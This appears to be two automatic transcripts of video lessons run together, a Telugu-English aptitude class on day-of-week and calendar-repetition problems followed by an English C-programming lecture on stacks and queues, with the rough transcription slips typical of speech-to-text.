వస్తుంది. ద సేమ్ థింగ్ ఇప్పుడు ఫర్ ఎగ్జాంపుల్ day 1 మండే అయినప్పుడు day 8 మళ్ళీ మండే. దానికి +7 చేస్తే day 15 వస్తుంది. day 15 కూడా మండే ఇప్పుడు కావాలి. సో ఫస్ట్ థింగ్ 4th March అనేది థర్స్డే. ఫ్యాంటాస్టిక్. సో ఇప్పుడు దీన్ని మీరు ఏం చేస్తారంటే +7 యాడ్ చేశారంటే నెక్స్ట్ చూడండి ఇట్ వస్తుంది 18 March కూడా థర్స్డేనే వస్తుంది. అండ్ దెన్ దీనికి +7 చేసినట్లయితే మీకు ఏమొస్తుంది? 25 March. 25 March కూడా థర్స్డే. ఆల్ రైట్. సో ఫ్రమ్ దిస్ వాట్ ఐ కెన్ సే 4, 11, 18, 25. So 25 plus 25 మాది 18, 25. So 4th, 11th, 18th, 25th. 1 days. మార్చ్లో 31 days ఉంది. డోంట్ యాడ్ 7 there. సో 4, 11, 18th, 25th of that particular మీకు థర్స్డేస్గా ఉంటుంది మార్చ్లో. ఆల్ రైట్. లెట్స్ సీ ద నెక్స్ట్ క్వశ్చన్. నెక్స్ట్ క్వశ్చన్ మీరు చూసినట్టయితే ద లాస్ట్ డే ఆఫ్ ద సెంచురీ కెనాట్ బి అన్నాడు. సో లాస్ట్ డే ఆఫ్ ద సెంచురీ కెనాట్ బి. సి దీనికి ఒక డైరెక్ట్గా నేను మీకు ఆన్సర్ చెప్పొచ్చు. ట్యూస్డే, థర్స్డే, సాటర్డే అని చెప్పి. బట్ ఐ డోంట్ వాంట్ టు టెల్ ఇన్ సచ్ ఏ వే. ఐ నీడ్ టు టెల్ యూ హౌ దిస్ వర్క్స్. అంటే సెంచురీ, ద లాస్ట్ డే ఆఫ్ ద సెంచురీ ఏంటంటే ప్రతి 100 yearsకి లాస్ట్ ఇయర్ ఫర్ ఎగ్జాంపుల్ సెంచురీ అంటే 100 years కదా. ఆ లాస్ట్ డే అనేది 31st December ఆఫ్ దట్ పర్టికులర్ సెంచురీ. లాస్ట్ డే ఆఫ్ ద సెంచురీ కెనాట్ బి. ఒక పర్టికులర్ రూల్ని ఫాలో అవుతుంది. అది ఎలా చెక్ చేయాలి? ఫర్ ఎగ్జాంపుల్ మనం ర్యాండమ్గా ఒక 4 dates తీసుకొని దాన్ని సాల్వ్ చేసినప్పుడు we will get to know what are the dates we get. Let's see how this works. నేను లాస్ట్ డే ఆఫ్ ద ఫ్రీక్వెంట్లీ ఆస్క్డ్ క్వశ్చన్ ఇది మీరు అర్థం చేసుకోవడానికి మాత్రమే నేను ప్రూవ్ చేసి చూపెడతాను. ఎగ్జామ్లో ప్లీజ్ డోంట్ డూ ఆల్ దిస్ క్యాల్కులేషన్. యూ కెన్ డైరెక్ట్లీ హిట్ ద ఆన్సర్. ఆల్ రైట్. నౌ లెట్స్ సే సో లాస్ట్ డే ఆఫ్ ద సెంచురీస్ కాబట్టి 31st December. Let's talk about 1999. All right, 31st December 1999. All right, century అన్నాడు కాబట్టి లెట్స్ టాక్ అబౌట్ సెంచురీ అంటే ఒక 100 yearsకి. సో ఇన్ సచ్ కేస్ మనకేం చేద్దాం? లెట్స్ టాక్ అబౌట్ 2000. Let's talk about 31st December 2000, last day of the century. Am I right? Or then మీరు చూసినట్లయితే లాస్ట్ డే December and then let's talk about 2100. All right, and then 31st December 100. సో ఇవన్నీ చూసారంటే లాస్ట్ డే ఆఫ్ దట్ సెంచురీ ఇయర్స్ కదా ఇవన్నీ. 1900, 2000, 2100, 2200. సో ఇవి మనం సాల్వ్ చేసి ఏ పర్టికులర్ ఇయర్లో ఏ పర్టికులర్ డేస్లో వస్తుందని మనం చెక్ చేసినట్లయితే ఇట్ ఈస్ ఈజీ ఫర్ us టు గెట్ ద ఆన్సర్. లెట్స్ సీ హౌ దిస్ వర్క్స్. ఫస్ట్ డేట్ మనం సాల్వ్ చేద్దాం. సో December 31st, 1900 అనేది మనం చూసినట్లయితే లెట్స్ సాల్వ్. సో సెంచురీ కోర్స్ మనకు క్లియర్గా తెలుసు. ఇట్ ఈస్ 1900 to 1999. Answer is 0. We all know this. 1900 to 1999 the code is 0. ఈ పర్టికులర్ కోడ్ యూస్ చేసి మనం సాల్వ్ చేయబోతున్నాం. నా గివెన్ డేట్ ఫస్ట్ ఇది లీప్ ఇయరా కాదా అనేది మీరు చెక్ చేసుకోవాల్సి ఉంటుంది. సో 1900 అనేది సెంచురీ ఇయర్ 400 మల్టిపుల్ కాదు. సో మీరు వరీ అవ్వాల్సిన అవసరం లేదు. 2000. సో ఆబ్వియస్లీ 1900 అనేది లీప్ ఇయర్ కింద రాదు. ఈవెన్ దో ఇట్ ఇస్ డివిజిబుల్ బై 4, ఇట్ ఇస్ నాట్ డివిజిబుల్ బై 400, హెన్స్ ఇట్స్ నాట్ ఎ లీప్ ఇయర్. సో ఇన్ సచ్ కేస్ వీ కెన్ ప్రొసీడ్. కోడ్. సో డిసెంబర్ యొక్క కోడ్ మీకు తెలుసు. ఇట్స్ లైక్ 033614625 035. అంటే లాస్ట్ డిసెంబర్లో మంత్ కోడ్ ఏమొస్తుంది? ఇట్స్ 5 ప్లస్
నెక్స్ట్ చూసినట్టే సెంచరీ కోడ్ ఇక్కడ ఏంటి 0 ప్లస్ లాస్ట్ 2 digits ఆఫ్ ద గివెన్ ఇయర్ 00 ప్లస్ 000 3 digits చూసినట్లయితే 3 పారామీటర్స్ అన్ని 0 అయింది. సో 31 ప్లస్ 6 ఆబ్వియస్లీ 36/7. ఆల్రైట్ 36/7 ఏమవుతుంది 7 5 35. సో ఇట్ ఈస్ ఆబ్వియస్లీ రిమైండర్ అనేది ఇక్కడ 1 అవుతుంది. am I right? రిమైండర్ అనేది ఇక్కడ 1 which is nothing but Monday. రిమైండర్ 1 అంటే మండే. సో 7 5 35. then the remainder is 1 is Monday. Just ఏమని రాస్తున్నాను for your reference. it is Monday. Alright, now let's talk about 31st December 2000 ఏమవుతుంది అనేది ఒకసారి చెక్ చేసినట్లయితే fantastic. Alright, now so 2000 అనేది మీరు చూసినట్లయితే ఇట్స్ అ లీప్ ఇయర్ 400 డివిజిబుల్. బట్ 31st డిసెంబర్లో ఉంది కాబట్టి ఇది సెకండ్ స్లాట్లో ఉంది. మార్చ్ 1st నుండి డిసెంబర్ 31st వరకు సెకండ్ స్లాట్, అంటే మీరు -1 చేయాల్సిన అవసరం లేదు. యూ కెన్ ప్రొసీడ్. లీప్ ఇయర్ అయినా ఏం చేంజెస్ లేదు, జస్ట్ ప్రొసీడ్ అకార్డింగ్లీ. సో ఫస్ట్ థింగ్ డేట్ ఏంటి, గివెన్ డేట్ ఇట్ ఇస్ 31 ప్లస్ మనం చూసినట్లయితే మంత్ కోడ్, డిసెంబర్ మంత్ కోడ్ ఏమవుతుంది 05, నో చేంజెస్ అట్ ఆల్. ప్లస్ సెంచరీ కోడ్, ఎస్ సెంచరీ కోడ్ ఇక్కడ మీరు చూసినట్లయితే 2000 నుండి 2099 దాకా మనకు సెంచరీ కోడ్ ఏమవుతుంది 06 అవుతుంది. ఆల్రైట్ 6. సో ఇట్స్ గోయింగ్ టు బి 6 ప్లస్ లాస్ట్ 2 digits ఆఫ్ ద గివెన్ ఇయర్ ఇట్ ఇస్ 00 ప్లస్ దీంట్లో 4 మల్టిపుల్స్ ఏంటి 00, నో టెన్షన్, బై 7. నా ఇప్పుడు మీరు చూసినట్లయితే 31 5 ఎంతంటే 36 ప్లస్ 6 ఏమవుతుంది 36 ప్లస్ 6 మీరు చూసినట్లయితే ఇట్ ఇస్ 42. సో 42/7. సో ఇప్పుడు రిమైండర్ మీకు ఏమవుతుంది 0 అవుతుంది. అవునా, 7 6 42, రిమైండర్ 0. సో 0 అనేది రిమైండర్ అంటే మనకి ఏ పర్టికులర్ డే వస్తుంది, సండే వస్తుంది. సో 31st December 2000 మీరు చూసినట్లయితే ఇట్ ఈస్ గోయింగ్ టు బి సండే. 31st December 2000 ఇస్ గోయింగ్ టు బి సండే. ఆల్రైట్, నెక్స్ట్ మనం చూసినట్లయితే సో 31st December 2100 అనేది మనం చెక్ చేయాల్సి ఉంటుంది. 31st December 2100 అనేది చెక్ చేయాల్సి ఉంటుంది. ఇక్కడ ఏంటంటే 31st December 2100, థర్డ్ డేట్ ఇస్ 31 అండ్ దెన్ ప్లస్ సో వాట్ ఇస్ దట్ మంత్ కోడ్ విచ్ ఇస్ 5 ప్లస్ 996 అండ్ దెన్ నెక్స్ట్ చూసారంటే 4 అవుతుంది. ప్లస్ లాస్ట్ 2 digits 00. ఈ 00లో 4 మల్టిపుల్స్ ఉంటాయా, ఉండవు. సో నో ప్రాబ్లం. సో ఆబ్వియస్లీ బై 7. ఆల్రైట్, నా నెక్స్ట్ మీరు చెక్ చేసినట్లయితే జస్ట్ దీన్ని యాడ్ చేసి మీరు డివిజన్ చేయండి. సో బై 7, 40/7. సో అంతే కదా, 31 ప్లస్ 5 36 ప్లస్ 4 40/7. నా 40/7 మీరు డివిజన్ చేసినట్లయితే ఏమైతుంది, విల్ గెట్ 5. am I right? సో 7 5 35 and the remainder is 5. సో 5 obviously the remainder. అండ్ 5 రిమైండర్ అయితే 5 ఏం డే అవుతుంది మీరు చెక్ చేసినట్లయితే 5 ఇస్ ఆబ్వియస్లీ మండే 1, ట్యూస్డే 2, వెన్స్డే 3, థర్స్డే 4 అండ్ 5 ఇస్ ఫ్రైడే. కి లాస్ట్ డే ఏమవుతుంది, ఫ్రైడే అవుతుంది. 31st December 1990 మండే, 31st December 2000 సండే, 31st December 2100 ఏం డే వస్తుంది చెక్ చేసినట్లయితే విల్ గెట్ అ క్లియర్ పిక్చర్ లాస్ట్ డే. ఆల్రైట్, నౌ లాస్ట్ డే విచ్ ఇస్ నథింగ్ బట్ 31st December 2200 ఏమవుతుంది, గివెన్ డేట్ ఫస్ట్ నోట్ చేసిన 31 ప్లస్ మంత్ కోడ్ ఇస్ బై 7. am I right? సో డైరెక్ట్ క్యాలిక్యులేషన్ అది. సో 31 ప్లస్ 5 36 38 అవుతుంది. సో 38/7 whereas the remainder is 3. అవునా, రిమైండర్ అనేది 3 అవుతుంది. సో 3 అంటే వెన్స్డే. సో 31st December 2200 is Wednesday. 31st December 2200 is Wednesday. Now next చూసినట్లయితే మీరు మండే, సాటర్డే, ఫ్రైడే, వెన్స్డే 4 పర్టికులర్ డేట్స్ చూసాము. ఇంకొక డేట్ మనం చూసినట్లయితే వీ విల్ గెట్ అ క్లియర్ పిక్చర్ ఆన్ వాట్స్ గోయింగ్ ఆన్. ఆల్రైట్, నెక్స్ట్ మీ అండర్స్టాండింగ్ 300 నౌ. సో 31st December 2300. సో 2300 ఎలా ఉంటుంది, సేమ్ థింగ్. సో ఫస్ట్ 0 6 0, 21st centuryకి 6, ఆ తర్వాత 4, ఆ తర్వాత 2, మళ్ళీ నెక్స్ట్ 24th century వచ్చేసరికి 0 వచ్చేస్తుంది. ఇన్ సచ్ కేస్ నౌ లెట్స్ సీ ఇయర్ కోడ్ హియర్ ఇట్ ఇస్ ఫస్ట్ గివెన్ డేట్ ప్లస్ మంత్ కోడ్ 05 and the century code, obviously year code కాదు, century code. So century code is 00 plus and then last 2 digits 00 and then దీంట్లో ఈ పర్టికులర్ లాస్ట్ 2 digits లో 4 మల్టిపుల్స్ ఎన్ని చూసారంటే 00/7. నా ఇట్ ఇస్ వన్స్ అగైన్ ఈ క్యాలిక్యులేషన్ మీరు చెక్ చేసినట్టయితే 31 plus 5 36 and all zeros. సో 36/7 300 అని చేసేసరికి మళ్ళీ మండే వచ్చేస్తుంది.
I hope you understand how this works. So 31st December 1990 Monday, 31st December 2000 Sunday, 31st December 2100 Friday, 31st December 2200 Wednesday, 31st December 2300 వచ్చేసరికి ఎలా ఈ 0642 నే వస్తుంటుంది. ఆల్రైట్, సో ఇందులో మీకు లాస్ట్ డే అంటే 31st December ఆఫ్ దట్ పర్టికులర్ సెంచురీ, నాట్ డెకేడ్, 100 years. సో ఇందులో మీరు అండర్స్టాండ్ చేసుకోవాల్సిందంటే మండే, రిమెంబర్ మండే, సండే, ఫ్రైడే, వెన్స్డే అనేది లాస్ట్ డే రిపీట్ అవుతూనే ఉంటుంది ఒక పర్టికులర్ ఆర్డర్లో. ఆల్రైట్, ఇన్ సచ్ కేస్ మీకు రిపీట్ దీంట్లో లాస్ట్ డే ఆఫ్ దట్ సెంచురీ రానివి ఏవి అని చూసంటే మిస్సింగ్ చూడండి. ట్యూస్డే నో వీఆర్ నాట్ గెటింగ్, and then Thursday we are not getting, and then Saturday we are not getting. So from this I can say the last day of the century calculation అనేది ఎగ్జామ్లో మీరు చేస్తే మీకు టైం సరిపోదు. ఇది జస్ట్ మీకు అండర్స్టాండింగ్ కోసమే చేసి చూపెట్టాను. మీకు కావాలి అంటే 31st December 2400 వెన్స్డే అనేది రిపీట్ అవుతూనే ఉంటుంది తప్ప at any cost last day of that century cannot be Tuesday, Thursday and then Saturday. Remember this. Alright, let's see the next question. Next question చూసినట్లయితే, okay, the last day of the century year cannot be is we are done with this. And then the next question, alright, the first day of the century year can be annaru. So ela aithe the last day of the century year cannot be annappudu manam em cheptam, cannot be ante manam em cheptam, yes, Monday, Saturday, Friday, Wednesday. But ee particular question మీరు చూసినట్లయితే లాస్ట్ డే కాదు, ఫస్ట్ డే ఆఫ్ ద సెంచురీ ఇయర్ క్యాన్ బి అన్నాడు. సో ఇదేలాగా మీరు 1st January తీసుకున్నారు అంటే సాల్వ్ చేసి వస్తే, సో ఎక్స్ప్లెనేషన్ నేను మీకు చెప్పాను. సో మళ్ళీ కంప్లీట్గా ద లాస్ట్ డేస్ ఆఫ్ ద సెంచురీ ఇయర్ క్యాన్ బి ఫ్రైడే, వెన్స్డే, మండే, సండే. ఇదే మనం డిస్కస్ చేసాం. సో ఇవన్నీ లాస్ట్ డేస్ వచ్చేటప్పుడు సెంచురీలో, సో న్యాచురలీ ద ఫస్ట్ డే ఆబ్వియస్లీ సాటర్డే ఉంటుంది. వెన్స్డే లాస్ట్ డే ఆఫ్ ద సెంచురీ అయితే థర్స్డే ఉంటుంది. సో Monday last day of the century అయితే, forget about the order, the first day of the century can be Saturday, Thursday, Tuesday, Monday అవుతుందమ్మా. I repeat, Saturday, Thursday, Tuesday. మీరు ఇక్కడ చూసినట్లయితే ఇవే ఫస్ట్ డే ఆఫ్ ద సెంచురీస్ రావడానికి ఉన్న ఛాన్సెస్. ఫస్ట్ సాటర్డే రావచ్చు. ఫస్ట్ డే ఆఫ్ ద సెంచురీ అంటే 1st Jan, let's say for example 1st Jan 2001 is the best example. Now if you see the screen, Saturday, Thursday and then Tuesday and then Monday ఇవే రావడానికి ఛాన్సెస్ ఉంది. I hope you understand. Let's see the next question. Which will have the same calendar year as that of 2011? Which will have the same calendar year as of 2011? And for this unte, so you can answer it within fraction of seconds. Alright, ఆ కండిషన్ ఏంటి అని మనం చూద్దాం. సో 2011 యొక్క క్యాలెండర్ ఇయర్ మళ్ళీ ఎప్పుడు రిపీటేషన్ అంటే ఏంటి అని చూసారంటే, లెట్స్ టేక్ దిస్ 2018 అనే ఇయర్లో డెఫినెట్గా Jan 1st అనేది ఒక పర్టికులర్ డే వచ్చి ఉంటుంది. Jan 2nd అనేది ఒక పర్టికులర్ డే. ఇదేలాగా ఫస్ట్ డే ఆ పర్టికులర్ డేలో రావడం, ఆ పర్టికులర్ డేట్లో రావడం, ఏ పర్టికులర్ డేట్ తీసుకున్నా ఆ పర్టికులర్ డేట్ ఏ పర్టికులర్ డేలో ఉంది అనేది ఈ క్యాలెండర్లో అలానే ఉంటుంది. బట్ ఇది ఏంటంటే ఒక అల్గర్థంని ఫాలో అవుతూ రిపీట్ అవుతుంటుంది. ఆ అల్గర్థం ఏంటి అనేది మనం ఇప్పుడు తెలుసుకుందాం. లెట్స్ సీ ఫర్ ఎగ్జాంపుల్, మీరు చూసినట్లయితే ఇయర్ క్యాలెండర్ మళ్ళీ ఎప్పుడు రిపీట్ అవుతుందంటే ఎవ్రీ 28 yearsకి ఒకసారి లీప్ ఇయర్ క్యాలెండర్ రిపీట్ అవుతుంది. ఫర్ ఎగ్జాంపుల్ 2000 అనేది లీప్ ఇయర్. ఆ పర్టికులర్ క్యాలెండర్ మీకు ఎప్పుడు రిపీట్ అవుతుందంటే 2028, జస్ట్ యాడ్ 2028లో రిపీట్ అవుతుంది. ఇఫ్ ద గివెన్ ఇయర్ ఇస్ అ ఇయర్ నెక్స్ట్ టు లీప్ ఇయర్, దెన్ యాడ్ 6. నెక్స్ట్ టు లీప్ ఇయర్ అంటే ఫర్ ఎగ్జాంపుల్ ఇప్పుడు 2000 అనేది లీప్ ఇయర్, లేదు మీరు 2004 తీసుకోవచ్చు లీప్ ఇయర్, 2008 తీసుకోవచ్చు. మీరు ఏ లీప్ ఇయర్ మీరు తీసుకున్నట్టయినా మీరు జస్ట్ 28 సీ హావ్ దిస్ బాక్స్. సో 2004 నేను తీసుకున్నాను. 2004 అనేది ఇయర్ ఒక లీప్ ఇయర్. ఈ లీప్ ఇయర్ క్యాలెండర్ నాకు మళ్ళీ ఎప్పుడు రిపీట్ అవుతుందంటే జస్ట్ యాడ్ 28. మీ 2032 క్యాలెండర్ అనేది సేమ్గా ఉంటుంది. దిస్ ఇస్ హౌ ద క్యాలెండర్ అల్గరిథం వర్క్స్. దిస్ ఇస్ హౌ దే డిజైన్ ద అల్గరిథం. ఆల్ రైట్, నెక్స్ట్ లెట్స్ సే ఫర్ ఎగ్జాంపుల్ మీరు ప్లస్ 28 యాడ్ చేసినట్టయితే ఏమవుతుంది? ఇట్స్ సో సింపుల్, 2044. సో 2044. సో 2016 అండ్ 2044 క్యాలెండర్ రెండు సేమ్గా ఉంటుంది. ఓకే, రిపీట్ అవుతుంది. ఇది లీప్ ఇయర్కి. సో ఇఫ్ ద ఇయర్ నెక్స్ట్ టు లీప్ ఇయర్ అంటే ఏంటని చూస్తే ఫర్ ఎగ్జాంపుల్ 2004 అనేది మీకు లీప్ ఇయర్ అవునా. సో ఇయర్ నెక్స్ట్ టు లీప్ ఇయర్ అంటే 2005 అనేది ఇయర్ నెక్స్ట్ టు లీప్ ఇయర్ అవుతుంది. సేమ్ థింగ్ ఇప్పుడు 2016 అనేది లీప్ ఇయర్ అయితే 2017 అనేది ఇయర్ నెక్స్ట్ టు లీప్ ఇయర్. ఆల్రైట్, తర్వాత ఇమ్మీడియట్గా వచ్చే లీప్ 2005 తీసుకుంటున్నాను. 2005 ఇస్ అన్ ఇయర్ నెక్స్ట్ టు లీప్ ఇయర్, ఎందుకంటే 2004 లీప్ ఇయర్. 5లో వచ్చిన 2005లో వచ్చిన ఇయర్ యొక్క క్యాలెండర్ ఇయర్ దాని యొక్క రిపిటేషన్ ఎప్పుడు ఉంటుందంటే మళ్ళీ యాడ్ 6 అంటే
2011లో రిపీట్ అవుతుంది. బట్ మన క్వశ్చన్ ఇది కాదు, మనకి 2011లో వచ్చే క్యాలెండర్ మళ్ళీ ఎప్పుడు రిపీట్ అవుతుంది దానికి మళ్ళీ వస్తాను. అండ్ దెన్ వీ హ్యావ్ వన్ మోర్ థింగ్, ఫర్ అదర్స్ యాడ్ 11 అని చెప్పాను. ఫర్ అదర్స్ యాడ్ 11 అంటే ఫర్ ఎగ్జాంపుల్ ఒక లీప్ ఇయర్ నుండి ఇంకొక లీప్ ఇయర్ రావడానికి మనకి 4 years మధ్యలో గ్యాప్ ఉంటుంది. ఐ మీన్ ఎవ్రీ 4 years వస్తుంది కాబట్టి మధ్యలో 3 years గ్యాప్ ఉంటుంది. ఇన్ సచ్ కేస్ ఎలా అనేది చూద్దాం. నేను 2016, 2017, 2018 అండ్ దెన్ 2019 ఈ 4 years నేను మీకు తీసుకుంటున్నాను. దీంట్లో దిస్ ఇస్ లీప్ ఇయర్, నేను +28 యాడ్ చేశాను. రిమెంబర్ +28 యాడ్ చేస్తే నా క్యాలెండర్ ఇయర్ రిపీట్ అవుతుంది. నా దిస్ ఇస్ 2017, ఇది ఇయర్ నెక్స్ట్ టు లీప్ ఇయర్. 2017 ఏమవుతుందంటే 2023లో మళ్ళీ రిపీట్ అవుతుంది. సో ఐ విల్ జస్ట్ యాడ్ 6, ఎందుకంటే దిస్ ఇస్ ద అల్గోరిథం. +6 అనేది యాడ్ చేస్తాను ఎందుకంటే ఇయర్ నెక్స్ట్ టు లీప్ ఇయర్ కాబట్టి జస్ట్ యాడ్ 6. ఫర్ అదర్స్ అని ఇక్కడ ఏంటంటే 2018, 2019 అనేది అదర్స్, ఎందుకంటే మళ్ళీ మీకు 2020 అనేది లీప్ ఇయర్, మళ్ళీ 2020 లీప్ ఇయర్. సో ఇది వదిలేస్తే ఈ రెండింటికి మనం జస్ట్ ఏమవుతుంది ఎలా చేస్తే, సో సింపుల్, వీ హ్యావ్ టు యాడ్ +11 అంటే 2018కి 11 యాడ్ చేసి మీకు ఏమవుతుంది, క్యాలెండర్ ఇయర్ 2029లో రిపీట్ అవుతుంది. అండ్ దెన్ 2019 యొక్క క్యాలెండర్ ఇయర్ 2030లో రిపీట్ అవుతుంది. సో సింపుల్. ఆల్రైట్, యాడ్ 28 if it's a leap year, add 6 if it's a year next to leap year, add 11 for others. ఇప్పుడు మన క్వశ్చన్ మనం చూసినట్లయితే, సో just see the questions. It is so simple. Which are, I mean, will have the same calendar year as that of 2011 అని చెప్పి మీకు ఇచ్చాము. 2011 మీకు ఇచ్చినట్లయితే, see it is so simple. So here am I right, 2008 అనేది లీప్ ఇయర్, 2009 అనేది చూసినట్లయితే మీకు ఇయర్ నెక్స్ట్ టు లీప్ ఇయర్, నెక్స్ట్ 2010 and then 2011. This is how it works. So అది నేను మీకు క్లియర్గా రాస్తే, I repeat this once again. సో 2008 అనేది మీరు చూసినట్లయితే 11 అదర్స్ వస్తుంది కాబట్టి జస్ట్ యాడ్ +11. సో విచ్ యుల్ గెట్ ఇట్ ఇన్ 2023. 2011, I mean it's like 2022. That's it. Just add 11. It's so simple. So whatever it is, just add 11. And if you see the options, it is 2022. That is what we are talking about. My screen is 2022. All right. Now, so very important question. How many days are there in X weeks and X days? Most frequently asked question when it comes to calendars. So question malli note cheskondi, chala important. How many days are there in X weeks and X days? So X weeks, X days lo, I mean ఎన్ని డేస్ ఉంటుంది. వాట్ డస్ ఇట్ మీన్ ఎక్స్ వీక్స్ అండ్ ఎక్స్ డేస్ అని మీకు క్వశ్చన్ రావచ్చు. ఫర్ ఎగ్జాంపుల్ ఎక్స్ వీక్స్ ఎక్స్ డేస్ అంటే ఎక్స్ వెల్లీలో మీన్ ఎక్స్ ప్లేస్లో మీరు ఏదైనా సబ్స్టిట్యూట్ చేయించుకోవచ్చు. ఐ మీన్ 2 weeks 2 days లా క్యాలిక్యులేట్ చేస్తాం. మనకి ఇక్కడ 4 ఆప్షన్స్ ఇచ్చారు. అదేంటంటే ఫస్ట్ ఇట్ ఇస్ 7x² అండ్ దెన్ 8x, 14x, D, 7 and E, none of this. Answer is so simple. Answer is 8x. 8x ఎలా వస్తుంది అనేది ఒకసారి మనం చెక్ చేద్దాం. See, so simple. So x weeks, x days. Am I right? X weeks, x days అనేది మనకి ఇక్కడ క్వశ్చన్. అండ్ దెన్ సో సింపుల్, లెట్ x ఈక్వల్ టు 3 అయితే ఏమవుతుంది మీకు 3 weeks 3 days అవుతుంది. Am I right? Just because x is common for weeks and days, 3 weeks 3 days అవుతుంది. 3 weeks 3 days ఎంత అని మీరు చెక్ చేసినట్టే 3 weeks అంటే we know that weekly 7 days, 3 weeks అంటే 21 days and then 3 it is going to be 24 days. సో 3 weeks 3 daysలో మొత్తం ఎన్ని డేస్ ఉంటుందంటే 24 days. ఇప్పుడు ఈ 24 అనేది మీకు ఆప్షన్లో ఎక్కడ సాటిస్ఫై అవుతుందో దట్ ఈస్ గోయింగ్ టు బి ద ఆన్సర్. సో మీకు ద వాల్యూ ఆఫ్ ఎక్స్ ఇట్ ఇస్ 3. సో 7 into 3 square. 7 into 3 square and 7 into 9. So 7 into 9 is obviously 7 9s are, it is 63. It is not the answer just because we are supposed to get 24 days. Avuna. Next option 2 chudandi. Option 2, what is option 2 here? It is 8x. So simple, 8x. So 8 into point is nothing but into x and ekadanta, x is 3. So 8 into 3 which is 24 days. Perfect. So this is going to be our answer. 8x is the answer. And 14x annaru, 14 into 3 42, not at all sufficient. And 7 no, and none of this no. So answer is 8x. Alright, so ఒక పర్టికులర్ డేట్ ఇచ్చి ఆ పర్టికులర్ డేట్లో ఏ డే అనేది క్యాలెండర్స్ కాన్సెప్ట్. ఇఫ్ యూ హ్యావ్ ఎనీ questions or doubts, please post in the comments. I shall reply. I'm just waiting for your comments. Alright, thank you so much for the class.
Hello students, welcome to the C language training program. Today I want to discuss about queue data structure in C programming language. How to create the queue data structure in C programming language. Now the last session I discussed stack data structure. What is meant by stack? Stack is nothing but last in first out data structure. What is meant by stack? It's a linear list. Store that should be removed first. Which element is first inserted, that to be removed last. Which are the real life example for the stack? Pile of plates on the dining table. On the dining table first I place the plates, top of each other second plate, top of each other third plate. If I place the first plate, that should be removed. Which is the real life example for the stack? Pile of plates on the dining table. Last in first out manner. Which element is last inserted, that should be removed first. Which element is first inserted, that should be removed last. Which element into the stack? If you want to insert the new element into the stack, it's called as push. What is meant by pop? If I want to remove the element from the stack, the deletion element from the stack is called as pop. What is meant by display? Whatever stack you are already created, the list of elements to be displayed. Top to bottom, all elements to be displayed. Whenever push function is possible, if the top indicator less than or equal to size minus 1, push is possible. If the top is less than or equal to size minus 1, you can insert the elements. Whenever top is greater than size minus 1, push function not possible. It is shown the error stack is overflow or stack is full. Whenever pop operation is possible, if you delete element from the list, that is pop. If the top equal to minus 1, stack is empty. Top equal to minus 1 called as stack is empty, there is no elements, you can't remove. If the top is greater than or equal to size minus 1 or top is greater than or equal to 0, whenever top is greater than or equal to 0, you can pop the elements. If the top equal to minus 1, there is no element, stack is empty. It is called as underflow. When you display the stack elements, if you have at least one element or more than one element, then only you can display. If the top equal functions can be used, push, pop, display functions. What is the drawback of the stack? Drawback of the stack, anywhere you can't insert the elements, anywhere you can't delete the elements, top position only to insert the elements, top position only to delete the elements. At topmost only to insert elements, at the topmost only you delete the elements. What is one more kind of data structure in C programming language? Queue data structure you have. Queue. What is meant by queue data structure? FIFO manner. First in, first out. Which element is first inserted, that should be removed first. Counter, some persons are standing on the queue. The first person taken the first ticket and quit from the queue. Second person taken the second ticket and quit from the queue. Which person is last stander, that person taken the last ticket and quit from the queue. What is the operation of the queue here? First in, first out manner. Which element is first inserted, that should be removed first. Which element is last inserted, that should be removed last. Suppose my queue size is 5 elements. I can insert 5 elements. Suppose if I want to insert the new element into the queue, wherever insertion possible, back. What is meant by back here? Rear index. Every queue can perform with 2 indexes. One is for front, another one rear. Front is nothing but which is the first position element, that is front. Front index is 0. What is meant by rear? Which is the last element in your queue, that element is called as rear index.
front equal to 0 index, rear equal to size minus 1. If my queue size is 5, 0 to 4. 0 is the front index, 5 minus 1, 4 is the rear index. If you want to insert the new element into the queue, where you can insert the new element? Rear position you can insert the elements. The new element inserted at rear. If I want to delete the element from the queue, front position to delete. Deletion at the front, insertion at the rear. Whenever you are insert the new elements into the queue, which to be increment? Rear plus plus. If you are insert the element into the queue, rear index increments, rear plus plus. If you are delete the elements from the queue, which index to be increment? Front plus plus, rear plus plus, rear position increments. Finally, what is my conclusion? The queue is a data structure. It's a linear data structure. Queue is also linear data structure, line by line to store the elements. Line by line to store the elements. It's a FIFO manner, first in first out. Which element is first inserted in your queue, that should be removed first. Which element is last inserted into the queue, that should be removed last. Stack is a LIFO manner, last in first out. Which element last inserted, that to be removed first. But the queue is a FIFO manner. What is the way you are inserted? Same way to delete. Stack which